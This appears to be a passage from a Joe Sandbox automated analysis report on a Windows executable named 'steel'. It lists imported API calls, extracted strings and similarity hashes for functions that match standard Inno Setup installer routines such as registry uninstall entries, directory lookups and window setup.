• Instruction Fuzzy Hash: 95F2C6346005248FCB00EF69D9D9F9973F1BF49304F1582BAE5049B36ADB74AC46CB9A
APIs
• FindFirstFileA.KERNEL32(00000000,?,00000000,004750F2,?,?,0049C1E0,00000000), ref: 00474FE1
• FindNextFileA.KERNEL32(00000000,?,00000000,?,00000000,004750F2,?,?,0049C1E0,00000000), ref: 004750BE
• FindClose.KERNEL32(00000000,00000000,?,00000000,?,00000000,004750F2,?,?,0049C1E0,00000000), ref: 004750CC
Strings
Memory Dump Source
• Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_steel.jbxd
Similarity
• API ID: Find$File$CloseFirstNext
• String ID: unins$unins???.*
• API String ID: 3541575487-1009660736
• Opcode ID: 490a2bf6f62b777b12f8bb075fd261ec892e44da2a65e6c72c5e66397d3a6b60
• Instruction ID: 191fa049ef1442540897bd6b232d6b1da598bf4afdbbee48782243349675ce5a
• Opcode Fuzzy Hash: 490a2bf6f62b777b12f8bb075fd261ec892e44da2a65e6c72c5e66397d3a6b60
• Instruction Fuzzy Hash: 95315074A00548ABCB10EB65CD81BDEB7A9DF45304F50C0B6E40CAB3A2DB789F418B59
APIs
• FindFirstFileA.KERNEL32(00000000,?,00000000,00452AC3,?,?,-00000001,00000000), ref: 00452A9D
• GetLastError.KERNEL32(00000000,?,00000000,00452AC3,?,?,-00000001,00000000), ref: 00452AA5
Memory Dump Source
• Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_steel.jbxd
Similarity
• API ID: ErrorFileFindFirstLast
• String ID:
• API String ID: 873889042-0
• Opcode ID: 9c675a8f1f28b386d0fa8c71b8ecb41695e84785a8bb79b0d9bc0322d07a8b6a
• Instruction ID: 3e58272229af866f17ac5928e9872a720c3be2d4903e778e839a846eb7d55d53
• Opcode Fuzzy Hash: 9c675a8f1f28b386d0fa8c71b8ecb41695e84785a8bb79b0d9bc0322d07a8b6a
• Instruction Fuzzy Hash: 94F0F971A04604AB8B10EF669D4149EF7ACEB8672571046BBFC14E3282DAB84E0485A8
APIs
• GetVersion.KERNEL32(?,0046E17A), ref: 0046E0EE
• CoCreateInstance.OLE32(00499B98,00000000,00000001,00499BA8,?,?,0046E17A), ref: 0046E10A
Memory Dump Source
• Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_steel.jbxd
Similarity
• API ID: CreateInstanceVersion
• String ID:
• API String ID: 1462612201-0
• Opcode ID: 323ef6e325584454da74969db5385277b15969f7569c16a340aaa36caeb4eadb
• Instruction ID: e32462cabb755f907f5de1887460af807d545ab7c9798ff14e002636b2035e3f
• Opcode Fuzzy Hash: 323ef6e325584454da74969db5385277b15969f7569c16a340aaa36caeb4eadb
• Instruction Fuzzy Hash: 90F0A7352812009FEB10975ADC86B8937C47B22315F50007BE04497292D2BD94C0471F
APIs
• GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0049B4C0,00000001,?,00408633,?,00000000,00408712), ref: 00408586
Memory Dump Source
• Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_steel.jbxd
Similarity
• API ID: InfoLocale
• String ID:
• API String ID: 2299586839-0
• Opcode ID: 64da881718ef9bfb5c3691e8182369eeaf442f2681d4624e7b5adc518b999176
• Instruction ID: 8daab3ef8e56b0da8b8c23f45c5b5388ad46b50bd825570c2d348c61856efc62
• Opcode Fuzzy Hash: 64da881718ef9bfb5c3691e8182369eeaf442f2681d4624e7b5adc518b999176
• Instruction Fuzzy Hash: BFE0223170021466C311AA2A9C86AEAB34C9758310F00427FB904E73C2EDB89E4042A8
APIs
• NtdllDefWindowProc_A.USER32(?,?,?,?,?,00424151,?,00000000,0042415C), ref: 00423BAE
Memory Dump Source
• Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_steel.jbxd
Similarity
• API ID: NtdllProc_Window
• String ID:
• API String ID: 4255912815-0
• Opcode ID: 03c86555d74cd6010afd77b9e61a524e96c156e733cd5bd8e2feacc4387cef90
• Instruction ID: a748582893d7571d6ac8bdbe819d0a8fbf5f36db2d3505b6f19a51c7a0bbae16
• Opcode Fuzzy Hash: 03c86555d74cd6010afd77b9e61a524e96c156e733cd5bd8e2feacc4387cef90
• Instruction Fuzzy Hash: 47F0B979205608AF8B40DF99C588D4ABBE8AB4C260B058195B988CB321C234ED808F90
APIs
Memory Dump Source
• Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_steel.jbxd
Similarity
• API ID: NameUser
• String ID:
• API String ID: 2645101109-0
• Opcode ID: 969018677e36c7ee3cac7a31a88a81c68082f6a067fe28717e4d5eb0c099a74a
• Instruction ID: 9f318ec9847dd9a6abcb639c8bc611599857aea0b867fcad4bfaeec6bdb042bf
• Opcode Fuzzy Hash: 969018677e36c7ee3cac7a31a88a81c68082f6a067fe28717e4d5eb0c099a74a
• Instruction Fuzzy Hash: 8FD0C27230470473CB00AA689C825AA35CD8B84305F00483E3CC5DA2C3FABDDA485756
APIs
• NtdllDefWindowProc_A.USER32(?,?,?,?), ref: 0042F53C
Memory Dump Source
• Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_steel.jbxd
Similarity
• API ID: NtdllProc_Window
• String ID:
• API String ID: 4255912815-0
• Opcode ID: 9e43cbcd657a147b44e82c26281af1c584f356d37a2e763e4ec43db1fd6d4cd6
• Instruction ID: 7ca9c19e24a5def9c493c34941f9da96f9ca037215ec7a65a90973bf7a04e639
• Opcode Fuzzy Hash: 9e43cbcd657a147b44e82c26281af1c584f356d37a2e763e4ec43db1fd6d4cd6
• Instruction Fuzzy Hash: FCD09E7120011D7B9B00DE99E840D6B33AD9B88710B909925F945D7642D634ED9197A5

Control-flow Graph
(Graph for the function beginning at 46f058, with RegCloseKey called from node 46f6df-46f6f5; the rendered node and edge data is not reproduced here.)
                                                                                            APIs
                                                                                              • Part of subcall function 0046EE44: RegSetValueExA.ADVAPI32(?,Inno Setup: Setup Version,00000000,00000001,00000000,00000001,0047620E,?,0049C1E0,?,0046F15B,?,00000000,0046F6F6,?,_is1), ref: 0046EE67
                                                                                              • Part of subcall function 0046EEB4: RegSetValueExA.ADVAPI32(?,NoModify,00000000,00000004,00000000,00000004,00000001,?,0046F532,?,?,00000000,0046F6F6,?,_is1,?), ref: 0046EEC7
                                                                                            • RegCloseKey.ADVAPI32(?,0046F6FD,?,_is1,?,Software\Microsoft\Windows\CurrentVersion\Uninstall\,00000000,0046F748,?,?,0049C1E0,00000000), ref: 0046F6F0
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: Value$Close
                                                                                            • String ID: " /SILENT$5.5.3 (a)$Comments$Contact$DisplayIcon$DisplayName$DisplayVersion$EstimatedSize$HelpLink$HelpTelephone$Inno Setup: App Path$Inno Setup: Deselected Components$Inno Setup: Deselected Tasks$Inno Setup: Icon Group$Inno Setup: Language$Inno Setup: No Icons$Inno Setup: Selected Components$Inno Setup: Selected Tasks$Inno Setup: Setup Type$Inno Setup: Setup Version$Inno Setup: User$Inno Setup: User Info: Name$Inno Setup: User Info: Organization$Inno Setup: User Info: Serial$InstallDate$InstallLocation$MajorVersion$MinorVersion$ModifyPath$NoModify$NoRepair$Publisher$QuietUninstallString$Readme$RegisterPreviousData$Software\Microsoft\Windows\CurrentVersion\Uninstall\$URLInfoAbout$URLUpdateInfo$UninstallString$_is1
                                                                                            • API String ID: 3391052094-3342197833
                                                                                            • Opcode ID: 41e5a022c9dfc144d242315d0234d20c9f1df57cded100a3ade253d049a3cf6c
                                                                                            • Instruction ID: 0d1426ff9ce9a688a4d167ea33859b9e50b28094dc6fe7db73e07d6bdcf854ec
                                                                                            • Opcode Fuzzy Hash: 41e5a022c9dfc144d242315d0234d20c9f1df57cded100a3ade253d049a3cf6c
                                                                                            • Instruction Fuzzy Hash: D1125935A001089BDB04EF95E881ADE73F5EB48304F24817BE8506B366EB79AD45CF5E

                                                                                            Control-flow Graph

                                                                                             control_flow_graph (legend and rendered edge list omitted): basic blocks 492848 through 492d3c; named API nodes: Sleep, FindWindowA, SendMessageA, PostMessageA, SendNotifyMessageA, RegisterClipboardFormatA, GetProcAddress, GetLastError, FreeLibrary, CreateMutexA, OemToCharBuffA, CharToOemBuffA
                                                                                            APIs
                                                                                            • Sleep.KERNEL32(00000000,00000000,00492D3D,?,?,?,?,00000000,00000000,00000000), ref: 00492888
                                                                                            • FindWindowA.USER32(00000000,00000000), ref: 004928B9
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: FindSleepWindow
                                                                                            • String ID: CALLDLLPROC$CHARTOOEMBUFF$CREATEMUTEX$FINDWINDOWBYCLASSNAME$FINDWINDOWBYWINDOWNAME$FREEDLL$LOADDLL$OEMTOCHARBUFF$POSTBROADCASTMESSAGE$POSTMESSAGE$REGISTERWINDOWMESSAGE$SENDBROADCASTMESSAGE$SENDBROADCASTNOTIFYMESSAGE$SENDMESSAGE$SENDNOTIFYMESSAGE$SLEEP
                                                                                            • API String ID: 3078808852-3310373309
                                                                                            • Opcode ID: 543bbb3fa16e1ad260fa6bca8d7f7bf65573201bf2c1e3a3e9abb38e798cd817
                                                                                            • Instruction ID: 092cd3663c6e49ee7eb77a287a3c2ed341282e51176ce6ebc4a466309821376d
                                                                                            • Opcode Fuzzy Hash: 543bbb3fa16e1ad260fa6bca8d7f7bf65573201bf2c1e3a3e9abb38e798cd817
                                                                                            • Instruction Fuzzy Hash: D9C182A0B042003BDB14BF3E9D4551F59A99F95708B119A3FB446EB78BCE7CEC0A4359

                                                                                            Control-flow Graph

                                                                                             control_flow_graph (legend and rendered edge list omitted): basic blocks 483a7c through 483b52; named API nodes: GetModuleHandleA, GetProcAddress, GetNativeSystemInfo, GetSystemInfo, GetCurrentProcess
                                                                                            APIs
                                                                                            • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 00483A8D
                                                                                            • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00483A9A
                                                                                            • GetNativeSystemInfo.KERNELBASE(?,00000000,GetNativeSystemInfo,kernel32.dll), ref: 00483AA8
                                                                                            • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 00483AB0
                                                                                            • GetCurrentProcess.KERNEL32(?,00000000,IsWow64Process), ref: 00483ABC
                                                                                            • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryA), ref: 00483ADD
                                                                                            • GetModuleHandleA.KERNEL32(advapi32.dll,RegDeleteKeyExA,00000000,GetSystemWow64DirectoryA,?,00000000,IsWow64Process), ref: 00483AF0
                                                                                            • GetProcAddress.KERNEL32(00000000,advapi32.dll), ref: 00483AF6
                                                                                            • GetSystemInfo.KERNEL32(?,00000000,GetNativeSystemInfo,kernel32.dll), ref: 00483B0D
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressProc$HandleInfoModuleSystem$CurrentNativeProcess
                                                                                            • String ID: GetNativeSystemInfo$GetSystemWow64DirectoryA$IsWow64Process$RegDeleteKeyExA$advapi32.dll$kernel32.dll
                                                                                            • API String ID: 2230631259-2623177817
                                                                                            • Opcode ID: 7dca9948a1095c4364ab55fa8ed369d502b26d1142efbcbd424e95be4cda74f5
                                                                                            • Instruction ID: d1db678d6bd555fecb25ccca0b477ef677e73c145b16f55f8d8b06b946339d0c
                                                                                            • Opcode Fuzzy Hash: 7dca9948a1095c4364ab55fa8ed369d502b26d1142efbcbd424e95be4cda74f5
                                                                                            • Instruction Fuzzy Hash: 7F1181C0204741A4DA00BFB94D45B6F65889B11F2AF040C7B6840AA287EABCEF44A76E

                                                                                            Control-flow Graph

                                                                                             control_flow_graph (legend and rendered edge list omitted): basic blocks 468d88 through 468fbc; the only named API node in the graph is RegCloseKey at 468f7a-468f90
                                                                                            APIs
                                                                                              • Part of subcall function 0042DE1C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,;H,?,00000001,?,?,00483BE3,?,00000001,00000000), ref: 0042DE38
                                                                                            • RegCloseKey.ADVAPI32(?,00468FA2,?,?,00000001,00000000,00000000,00468FBD,?,00000000,00000000,?), ref: 00468F8B
                                                                                            Strings
                                                                                            • Software\Microsoft\Windows\CurrentVersion\Uninstall, xrefs: 00468DE7
                                                                                            • Inno Setup: No Icons, xrefs: 00468E73
                                                                                            • Inno Setup: User Info: Name, xrefs: 00468F47
                                                                                            • Inno Setup: Selected Components, xrefs: 00468EAA
                                                                                            • Inno Setup: Setup Type, xrefs: 00468E9A
                                                                                            • %s\%s_is1, xrefs: 00468E05
                                                                                            • Inno Setup: User Info: Organization, xrefs: 00468F5A
                                                                                            • Inno Setup: Deselected Tasks, xrefs: 00468F19
                                                                                            • Inno Setup: User Info: Serial, xrefs: 00468F6D
                                                                                            • Inno Setup: Deselected Components, xrefs: 00468ECC
                                                                                            • Inno Setup: App Path, xrefs: 00468E4A
                                                                                            • Inno Setup: Selected Tasks, xrefs: 00468EF7
                                                                                            • Inno Setup: Icon Group, xrefs: 00468E66
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: CloseOpen
                                                                                            • String ID: %s\%s_is1$Inno Setup: App Path$Inno Setup: Deselected Components$Inno Setup: Deselected Tasks$Inno Setup: Icon Group$Inno Setup: No Icons$Inno Setup: Selected Components$Inno Setup: Selected Tasks$Inno Setup: Setup Type$Inno Setup: User Info: Name$Inno Setup: User Info: Organization$Inno Setup: User Info: Serial$Software\Microsoft\Windows\CurrentVersion\Uninstall
                                                                                            • API String ID: 47109696-1093091907
                                                                                            • Opcode ID: b9928a5b5c0cf6c1dc91f6627cbb06318d05b30c5d76f15ccadbaf9fdfcb7506
                                                                                            • Instruction ID: 069c4cdb4b1287edb5c1b702bebeb6c44c7684ad2aa17a57d1fdfe9a2539746b
                                                                                            • Opcode Fuzzy Hash: b9928a5b5c0cf6c1dc91f6627cbb06318d05b30c5d76f15ccadbaf9fdfcb7506
                                                                                            • Instruction Fuzzy Hash: 6B51A330A006449BCB15DB65D881BDEB7F5EB48304F50857EE840AB391EB79AF01CB59

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                              • Part of subcall function 0042D898: GetWindowsDirectoryA.KERNEL32(?,00000104,00000000,00453DB4,00000000,00454066,?,?,00000000,0049B628,00000004,00000000,00000000,00000000,?,004983A5), ref: 0042D8AB
                                                                                              • Part of subcall function 0042D8C4: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D8D7
                                                                                              • Part of subcall function 0042D8F0: GetModuleHandleA.KERNEL32(kernel32.dll,GetSystemWow64DirectoryA,?,00453B5A,00000000,00453BFD,?,?,00000000,00000000,00000000,00000000,00000000,?,00453FED,00000000), ref: 0042D90A
                                                                                              • Part of subcall function 0042D8F0: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0042D910
                                                                                            • SHGetKnownFolderPath.SHELL32(00499D30,00008000,00000000,?,00000000,0047C942), ref: 0047C846
                                                                                            • CoTaskMemFree.OLE32(?,0047C88B), ref: 0047C87E
                                                                                              • Part of subcall function 0042D208: GetEnvironmentVariableA.KERNEL32(00000000,00000000,00000000,?,?,00000000,0042DA3E,00000000,0042DAD0,?,?,?,0049B628,00000000,00000000), ref: 0042D233
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: Directory$AddressEnvironmentFolderFreeHandleKnownModulePathProcSystemTaskVariableWindows
                                                                                            • String ID: COMMAND.COM$Common Files$CommonFilesDir$Failed to get path of 64-bit Common Files directory$Failed to get path of 64-bit Program Files directory$ProgramFilesDir$SystemDrive$\Program Files$cmd.exe
                                                                                            • API String ID: 3771764029-544719455
                                                                                            • Opcode ID: 23963da8b4b34a95ffd58041a931adf40c150fbdd8371ea61f0364dbdea36cdf
                                                                                            • Instruction ID: 88e29a10730232d74bbdb0c5b7d00c3ea12cf2700f44d19641833b453bfd909d
                                                                                            • Opcode Fuzzy Hash: 23963da8b4b34a95ffd58041a931adf40c150fbdd8371ea61f0364dbdea36cdf
                                                                                            • Instruction Fuzzy Hash: 1461CF74A00204AFDB10EBA5D8C2A9E7B69EB44319F90C47FE404A7392DB3C9A44CF5D

                                                                                            Control-flow Graph

                                                                                             control_flow_graph (legend and rendered edge list omitted): basic blocks 423874 through 4239ab; named API nodes: GetClassInfoA, RegisterClassA, GetSystemMetrics, SetWindowLongA, SendMessageA, GetSystemMenu, DeleteMenu
                                                                                            APIs
                                                                                              • Part of subcall function 0041F3C4: VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040,?,00000000,0041EDA4,?,0042388F,00423C0C,0041EDA4), ref: 0041F3E2
                                                                                            • GetClassInfoA.USER32(00400000,0042367C), ref: 0042389F
                                                                                            • RegisterClassA.USER32(00499630), ref: 004238B7
                                                                                            • GetSystemMetrics.USER32(00000000), ref: 004238D9
                                                                                            • GetSystemMetrics.USER32(00000001), ref: 004238E8
                                                                                            • SetWindowLongA.USER32(00410460,000000FC,0042368C), ref: 00423944
                                                                                            • SendMessageA.USER32(00410460,00000080,00000001,00000000), ref: 00423965
                                                                                            • GetSystemMenu.USER32(00410460,00000000,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C0C,0041EDA4), ref: 00423970
                                                                                            • DeleteMenu.USER32(00000000,0000F030,00000000,00410460,00000000,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C0C,0041EDA4), ref: 0042397F
                                                                                            • DeleteMenu.USER32(00000000,0000F000,00000000,00000000,0000F030,00000000,00410460,00000000,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001), ref: 0042398C
                                                                                            • DeleteMenu.USER32(00000000,0000F010,00000000,00000000,0000F000,00000000,00000000,0000F030,00000000,00410460,00000000,00000000,00400000,00000000,00000000,00000000), ref: 004239A2
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: Menu$DeleteSystem$ClassMetrics$AllocInfoLongMessageRegisterSendVirtualWindow
                                                                                            • String ID: |6B
                                                                                            • API String ID: 183575631-3009739247
                                                                                            • Opcode ID: 0318a091630d13b60d0a3e6aa49d41dd0f32c1053a4a49f7651c07b17dd5309d
                                                                                            • Instruction ID: 5979ac727d64f3fe5c9a0a43452729076f54e0f9e4c251b9a4c28f9d6bed272f
                                                                                            • Opcode Fuzzy Hash: 0318a091630d13b60d0a3e6aa49d41dd0f32c1053a4a49f7651c07b17dd5309d
                                                                                            • Instruction Fuzzy Hash: E63152B17402006AEB10AF69DC82F6A37989B14709F60017BFA44EF2D7C6BDED40876D

                                                                                             Control-flow Graph (legend: Executed / Not Executed)
                                                                                             control_flow_graph 1977 47ce78-47cece call 42c3fc call 4035c0 call 47cb3c call 4525d8 1986 47ced0-47ced5 call 453344 1977->1986 1987 47ceda-47cee9 call 4525d8 1977->1987 1986->1987 1991 47cf03-47cf09 1987->1991 1992 47ceeb-47cef1 1987->1992 1995 47cf20-47cf48 call 42e394 * 2 1991->1995 1996 47cf0b-47cf11 1991->1996 1993 47cf13-47cf1b call 403494 1992->1993 1994 47cef3-47cef9 1992->1994 1993->1995 1994->1991 1999 47cefb-47cf01 1994->1999 2003 47cf6f-47cf89 GetProcAddress 1995->2003 2004 47cf4a-47cf6a call 4078f4 call 453344 1995->2004 1996->1993 1996->1995 1999->1991 1999->1993 2006 47cf95-47cfb2 call 403400 * 2 2003->2006 2007 47cf8b-47cf90 call 453344 2003->2007 2004->2003 2007->2006
                                                                                            APIs
                                                                                            • GetProcAddress.KERNEL32(73AF0000,SHGetFolderPathA), ref: 0047CF7A
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressProc
                                                                                            • String ID: Failed to get address of SHGetFolderPath function$Failed to get version numbers of _shfoldr.dll$Failed to load DLL "%s"$SHFOLDERDLL$SHGetFolderPathA$]xI$_isetup\_shfoldr.dll$shell32.dll$shfolder.dll
                                                                                            • API String ID: 190572456-256906917
                                                                                            • Opcode ID: c4b8d3d93c7f37bb14fa31bc5bbe574b3393d33fbabbe9beac26f258e91ad005
